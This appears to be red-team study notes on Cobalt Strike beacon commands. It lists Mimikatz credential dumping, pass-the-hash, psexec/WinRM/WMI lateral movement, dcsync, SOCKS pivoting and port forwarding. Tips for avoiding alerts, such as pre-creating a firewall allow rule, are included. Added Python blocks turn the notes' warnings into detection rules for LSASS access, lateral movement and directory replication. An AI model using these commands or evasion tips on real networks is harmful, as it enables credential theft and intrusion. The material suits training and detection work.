Here is a list of common commands supported by a Cobalt Strike beacon. Also see S1ckB0y1337/Cobalt-Strike-CheatSheet for some notes.

Beacon Management

C2

  • connect [host] [port]: let CS connect to another TCP beacon
  • link [host] [pipe]: let CS connect to another SMB beacon
  • sleep N: change the sleep interval to N seconds
    • OPSEC warning: increasing check-in frequency may produce more noise on the network and reduce stealth.
  • checkin: manually issue a check-in to the beacon
    • DNS beacons require a manual check-in upon connection because they do not automatically send metadata over (due to DNS bandwidth limits).

Job control

  • jobs: list jobs
  • jobkill N: kill job N

Session Passing

  • spawn [x86|x64] [listener]: create a process and inject shellcode for a given listener
  • foreign listener (MSF protocol):
    • In msfconsole: Start a handler and set payload to windows/meterpreter/reverse_http
    • In CS: Create a “Foreign HTTP” listener with host and port matching that of the MSF handler. Once the payload is run (e.g. in a spawn command), msfconsole will receive a new Meterpreter session.
    • Note: x64 & stageless payloads not supported
  • Alternatively, a Meterpreter session can be created by first generating a raw stageless Meterpreter shellcode payload with msfvenom, then running it with shspawn [x86|x64] [file-to-payload].

Code Execution

Running code

  • run: run a command
  • execute-assembly: the beacon runs an attacker-supplied C# executable by loading it in memory (nothing is written to disk)
  • powershell-import /path/to/module.ps1: import a PowerShell module (provided by the attacker)
  • powershell Cmdlet [Args...]: run a PowerShell command on the beaconed host; piping supported
  • powerpick Cmdlet [Args...]: run PowerShell commands without spawning a powershell.exe process; also supports AMSI-bypass (post-ex option) unlike powershell

Information Gathering

Basic

  • getuid: get UID of beacon’s process

Screenshotting

  • screenshot / printscreen: take a screenshot (second one uses PrintScr)
  • screenwatch: take periodic screenshots of desktop

Keylogger

  • keylogger: start a keylogger job (also see View > Keystrokes)

Clipboard

  • clipboard: get clipboard content

Files

  • mv A B: move/rename files
  • cd DIR: change current directory
  • upload PATH: upload a local file to the beaconed machine

Reconnaissance

  • net logons: view logged on users on machine

Mimikatz / credential theft


  • logonpasswords / mimikatz !sekurlsa::logonpasswords: dump cached NTLM hashes / passwords (elevated)
    • OPSEC warning: This opens a read handle to LSASS and is logged under event 4656 (Kibana: “Suspicious Handle to LSASS”).
  • mimikatz !sekurlsa::ekeys: dump Kerberos encryption keys for logged-on users; these are more relevant than NTLM hashes, since it is the Kerberos keys that get used over the network most of the time. Look for aes256-hmac.
    • OPSEC warning: This opens a read handle to LSASS and is logged under event 4656 (Kibana: “Suspicious Handle to LSASS”).
  • mimikatz !lsadump::sam: This dumps NTLM hashes in the SAM database (local users only). If sysadmins reuse administrator passwords, SAM dumps can lead to lateral movement.
    • OPSEC warning: This opens a handle to the SAM registry hive (Kibana: “Suspicious SAM Hive Handle”).
  • mimikatz !lsadump::cache: Extracts domain cached credentials, which can only be cracked offline (since format isn’t NTLM) and cannot be used for attacks like pass-the-hash.
    • OPSEC warning: This opens a handle to the SECURITY registry hive (Kibana: “Suspicious SECURITY Hive Handle”).
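The three OPSEC warnings above describe the same telemetry: event 4656 (a handle to an object was requested) with LSASS, the SAM hive or the SECURITY hive as the object. The following is an added example, not part of the original notes or of the RTO lab's saved searches, that applies those three conditions to constructed events in a flattened ECS-like field layout; the field names, the sample records and the allowlist of processes that legitimately open LSASS are assumptions to be tuned per environment.

```python
# Constructed sample 4656 ("a handle to an object was requested") events in a
# flattened ECS-like shape. These are made-up records, not captured logs.
SAMPLE_EVENTS = [
    {   # logonpasswords / ekeys: read handle to LSASS from an unknown process
        "event.code": "4656",
        "winlog.event_data.ObjectType": "Process",
        "winlog.event_data.ObjectName": r"\Device\HarddiskVolume2\Windows\System32\lsass.exe",
        "winlog.event_data.ProcessName": r"C:\Windows\Temp\beacon.exe",
    },
    {   # lsadump::sam: handle to the SAM hive
        "event.code": "4656",
        "winlog.event_data.ObjectType": "Key",
        "winlog.event_data.ObjectName": r"\REGISTRY\MACHINE\SAM",
        "winlog.event_data.ProcessName": r"C:\Windows\Temp\beacon.exe",
    },
    {   # lsadump::cache: handle to a key under the SECURITY hive
        "event.code": "4656",
        "winlog.event_data.ObjectType": "Key",
        "winlog.event_data.ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets",
        "winlog.event_data.ProcessName": r"C:\Windows\Temp\beacon.exe",
    },
    {   # LSASS handle from an allowlisted system process: expected noise
        "event.code": "4656",
        "winlog.event_data.ObjectType": "Process",
        "winlog.event_data.ObjectName": r"\Device\HarddiskVolume2\Windows\System32\lsass.exe",
        "winlog.event_data.ProcessName": r"C:\Windows\System32\csrss.exe",
    },
    {   # Unrelated event code, ignored by every rule
        "event.code": "4688",
        "winlog.event_data.ProcessName": r"C:\Windows\System32\notepad.exe",
    },
]

# Assumed allowlist of requesters that legitimately open LSASS; tune per environment.
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe"}


def _basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _under_hive(obj_name, hive):
    """True if the registry object is the named HKLM hive or any key below it."""
    prefix = "\\REGISTRY\\MACHINE\\" + hive
    name = obj_name.upper()
    return name == prefix or name.startswith(prefix + "\\")


def classify(event):
    """Return the names of the saved searches (as named in the notes) this event matches."""
    if event.get("event.code") != "4656":
        return []
    obj_type = event.get("winlog.event_data.ObjectType", "")
    obj_name = event.get("winlog.event_data.ObjectName", "")
    requester = _basename(event.get("winlog.event_data.ProcessName", ""))
    hits = []
    if obj_type == "Process" and _basename(obj_name) == "lsass.exe":
        if requester not in LSASS_ALLOWLIST:
            hits.append("Suspicious Handle to LSASS")
    elif obj_type == "Key":
        if _under_hive(obj_name, "SAM"):
            hits.append("Suspicious SAM Hive Handle")
        elif _under_hive(obj_name, "SECURITY"):
            hits.append("Suspicious SECURITY Hive Handle")
    return hits


def scan(events):
    """Flatten matches to (saved-search name, requesting process) for triage."""
    return [(name, _basename(e.get("winlog.event_data.ProcessName", "")))
            for e in events for name in classify(e)]


if __name__ == "__main__":
    for name, proc in scan(SAMPLE_EVENTS):
        print(f"{name:34} <- {proc}")
```

Running the block prints three matches, all attributed to beacon.exe; the csrss.exe handle is dropped by the allowlist, which is where most of the tuning effort goes in practice.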

NOTE

Aforementioned Kibana saved searches are found in RTO lab.

Lateral Movement


  • pth DOMAIN\USER NTLM_HASH: pass-the-hash (uses Mimikatz underneath)
    • Use ls \\BEACON_HOST_FQDN\c$ to test for admin access after impersonation
  • make_token domain\user plaintext_pw: create a token for a user given the plaintext password (uses the LogonUserA API); the token can only be used over the network
    • The logon type passed to LogonUserA is LOGON32_LOGON_NEW_CREDENTIALS, which keeps the caller's token for the local machine and only uses the provided credentials over the network. This means make_token only works for authenticating against remote services; use spawnas for the local machine.
    • Looks the same as runas /netonly in logs (hard to distinguish regular from malicious use)
  • remote-exec [psexec|winrm|wmi] [target] [command args...]: execute a command on a remote host; use remote-exec without arguments to list supported modules (e.g. psexec, winrm, wmi).
    • see jump for psexec and winrm
    • wmi: WMI provides a “process call create” API to execute commands on the target. remote-exec abuses it by having it execute the uploaded payload binary.
      • To identify: event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
  • jump [psexec|winrm|...] [target] [listener]: run a payload on a remote target; run jump without arguments to list supported modules (e.g. psexec, winrm, …)
    • winrm & winrm64
      • OPSEC note: Use of SMB payloads is recommended since SMB traffic occurs frequently in AD environments.
      • One way to identify this lateral movement (that produces a lot of false positives): event.category: process and event.type: start and process.name: wsmprovhost.exe
      • To identify this lateral movement: event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"
    • psexec & psexec64: uploads a service binary that in turn executes the provided payload binary
      • Use of SMB payloads is also recommended as before.
      • To identify this lateral movement: event.code: 4697 and winlog.event_data.ServiceFileName: \\\\*\\ADMIN$\\*.exe
    • psexec_psh: use PowerShell oneliner instead of uploading a binary; always 32-bit
      • command pattern: %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ...
  • Running a second BOF as a different user (e.g. in case the call to CoInitializeSecurity triggered by running the first BOF was under a low-privileged user): beacon> execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_x64.exe"
  • rev2self: revert ticket to original (delete pass-the-hash ticket)
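The identification notes under remote-exec and jump are written as Kibana queries. As an added example (not from the original notes, the RTO lab or Cobalt Strike itself), the block below expresses the same five conditions as rules over constructed events in a flattened ECS-like layout and tags each with a confidence, so the wsmprovhost.exe rule, which the notes flag as producing many false positives, can be weighted down at triage. Field names, host names and the sample service file names are assumptions; the ADMIN$ wildcard and the psexec_psh command pattern are taken from the notes above.

```python
import fnmatch

# Constructed sample events in a flattened ECS-like shape (made-up, not captured logs).
SAMPLE_EVENTS = [
    {   # remote-exec wmi: child of WmiPrvSE.exe ("process call create")
        "event.category": "process", "event.type": "start",
        "process.name": "cmd.exe", "process.parent.name": "WmiPrvSE.exe",
        "host.name": "web",
    },
    {   # jump winrm: the WinRM plugin host starts (noisy on its own)
        "event.category": "process", "event.type": "start",
        "process.name": "wsmprovhost.exe", "process.parent.name": "svchost.exe",
        "host.name": "web",
    },
    {   # jump winrm: script block containing the stager's invoke call
        "event.category": "process",
        "powershell.file.script_block_text": "... $var_runme.Invoke([IntPtr]::Zero) ...",
        "host.name": "web",
    },
    {   # jump psexec: service installed with a binary dropped in ADMIN$
        "event.code": "4697",
        "winlog.event_data.ServiceFileName": r"\\10.10.120.20\ADMIN$\7f3a2b1.exe",
        "host.name": "web",
    },
    {   # jump psexec_psh: service whose "binary" is the PowerShell oneliner
        "event.code": "4697",
        "winlog.event_data.ServiceFileName":
            "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand AAAA",
        "host.name": "web",
    },
    {   # benign process start
        "event.category": "process", "event.type": "start",
        "process.name": "notepad.exe", "process.parent.name": "explorer.exe",
        "host.name": "ws1",
    },
    {   # benign service installation
        "event.code": "4697",
        "winlog.event_data.ServiceFileName": r"C:\Program Files\Vendor\agent.exe",
        "host.name": "ws1",
    },
]

# Wildcard from the notes' Kibana query with the KQL escaping undone (compared lower-cased).
ADMIN_SHARE_PATTERN = r"\\*\admin$\*.exe"
# Fragment of the psexec_psh command pattern given in the notes.
PSH_ONELINER = "powershell -nop -w hidden -encodedcommand"


def _is_process_start(e):
    return e.get("event.category") == "process" and e.get("event.type") == "start"


def detect(e):
    """Return (rule name, confidence) for each lateral-movement rule the event matches."""
    hits = []
    if _is_process_start(e):
        if e.get("process.parent.name", "").lower() == "wmiprvse.exe":
            hits.append(("wmi process call create", "high"))
        if e.get("process.name", "").lower() == "wsmprovhost.exe":
            hits.append(("winrm session host", "low"))  # many false positives
    if "$var_runme.Invoke([IntPtr]::Zero)" in e.get("powershell.file.script_block_text", ""):
        hits.append(("winrm jump script block", "high"))
    if e.get("event.code") == "4697":
        svc = e.get("winlog.event_data.ServiceFileName", "")
        if fnmatch.fnmatchcase(svc.lower(), ADMIN_SHARE_PATTERN):
            hits.append(("psexec service binary in ADMIN$", "high"))
        if PSH_ONELINER in svc.lower():
            hits.append(("psexec_psh oneliner service", "high"))
    return hits


def scan(events):
    """Flatten matches to (host, rule, confidence) tuples for triage."""
    return [(e.get("host.name", "?"), name, conf)
            for e in events for name, conf in detect(e)]


if __name__ == "__main__":
    for host, rule, conf in scan(SAMPLE_EVENTS):
        print(f"{host:5} {conf:5} {rule}")
```

Five of the seven sample events match exactly one rule each, all on host "web"; the two benign records on "ws1" match none. fnmatch is used for the ADMIN$ pattern because the only wildcard in the KQL query is `*`, which fnmatch treats the same way.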

DCSync

See: DCSync

The dcsync command lets us obtain username and credential data (e.g. NTLM hashes) from a DC. This requires the GetNCChanges right, which is usually only available to domain admins.

beacon> dcsync [fqdn] [domain]\[user]

This can be useful for crafting a golden ticket (by specifying krbtgt as the user) or for moving laterally to other domain admins.

A ticket is required for this command (e.g. make_token DEV\jking Qwerty123)

The beacon command is a wrapper around mimikatz lsadump::dcsync, which uses the MS-DRSR protocol.

OPSEC warning

Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set).

Find these using the “Suspicious Directory Replication” saved search in Kibana.
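As an added example of the 4662 search described above (not from the original notes or the RTO lab's saved search), the block below extracts the rightsGuid values from a 4662 event's Properties field, maps them to the replication control-access rights, and drops requests made by machine accounts, since domain controllers replicate with their own computer account and would otherwise fill the search with normal traffic. The table also includes 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, the separate rightsGuid of DS-Replication-Get-Changes-All, which the search text above folds into the first GUID. Field names, the machine-account filter and the sample records are assumptions.

```python
import re

GUID_RE = re.compile(r"\{?([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}?")

# Control-access rights used by directory replication, keyed by rightsGuid.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

REPL_PROPERTIES = ("{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")

# Constructed sample 4662 events (made-up records, not captured logs).
SAMPLE_EVENTS = [
    {   # dcsync run with a regular user's token (the make_token example above): alert
        "event.code": "4662",
        "winlog.event_data.SubjectUserName": "jking",
        "winlog.event_data.SubjectDomainName": "DEV",
        "winlog.event_data.AccessMask": "0x100",
        "winlog.event_data.Properties": REPL_PROPERTIES,
    },
    {   # same rights requested by a DC computer account: normal replication
        "event.code": "4662",
        "winlog.event_data.SubjectUserName": "DC01$",
        "winlog.event_data.SubjectDomainName": "DEV",
        "winlog.event_data.AccessMask": "0x100",
        "winlog.event_data.Properties": REPL_PROPERTIES,
    },
    {   # 4662 for some other control-access right (placeholder GUID, not a real one)
        "event.code": "4662",
        "winlog.event_data.SubjectUserName": "jking",
        "winlog.event_data.SubjectDomainName": "DEV",
        "winlog.event_data.AccessMask": "0x100",
        "winlog.event_data.Properties": "{00000000-0000-0000-0000-000000000001}",
    },
    {"event.code": "4624", "winlog.event_data.SubjectUserName": "jking"},
]


def replication_rights(properties):
    """Names of the replication rights whose GUIDs appear in a 4662 Properties field."""
    return {REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS}


def is_suspicious_replication(event, allow_machine_accounts=True):
    """True for a 4662 that requests replication rights from a non-machine principal."""
    if event.get("event.code") != "4662":
        return False
    rights = replication_rights(event.get("winlog.event_data.Properties", ""))
    if not rights:
        return False
    subject = event.get("winlog.event_data.SubjectUserName", "")
    # Assumed tuning: DCs replicate under their machine account ("DC01$"). Keep the
    # switch so a DC's own account can still be checked if it is suspected of compromise.
    if allow_machine_accounts and subject.endswith("$"):
        return False
    return True


def triage(events):
    """(DOMAIN\\user, sorted rights) for every event worth a look."""
    return [(e["winlog.event_data.SubjectDomainName"] + "\\" + e["winlog.event_data.SubjectUserName"],
             sorted(replication_rights(e.get("winlog.event_data.Properties", ""))))
            for e in events if is_suspicious_replication(e)]


if __name__ == "__main__":
    for who, rights in triage(SAMPLE_EVENTS):
        print(who, rights)
```

Only the first sample survives triage: DEV\jking requesting both Get-Changes rights. The Properties field is matched with a regex rather than a substring test because the event writes one GUID per line, in braces, and the casing varies between log shippers.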

Token Impersonation

See: token impersonation

Pivoting


SOCKS

SOCKS4a proxy: beacon> socks [port]

OPSEC warning

SOCKS4a proxy may be used by any user or device that has access to the team server. Use SOCKS5 for best security (i.e. authentication).

SOCKS5 proxy (supports authentication & additional logging): beacon> socks [port] socks5 disableNoAuth [username] [password] enableLogging.

  • Either view the teamserver output or use journalctl to view SOCKS5 authlogs.

To use the proxy with proxychains, first edit the config:

# /etc/proxychains.conf
# ...
socks4 127.0.0.1 [port]
socks5 127.0.0.1 [port] [username] [password]
# ...

Then to make a program use the proxy:

$ proxychains [command] [args...]

Port Forwarding

Reverse port forwarding: forwards a source port (on the beaconed host) to a destination interface and port (on the team server)

beacon> rportfwd [source-port] [interface-ip] [dest-port]

OPSEC warning

A Windows Defender Firewall alert will appear in the graphical shell. If the user clicks Cancel, an explicit block rule is created. To prevent this, create a rule allowing the traffic before running the rportfwd beacon command:

beacon> powershell New-NetFirewallRule -DisplayName "Pfwd-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort [source-port]

Remove the firewall rule later by its display name:

beacon> powershell Remove-NetFirewallRule -DisplayName "Pfwd-In"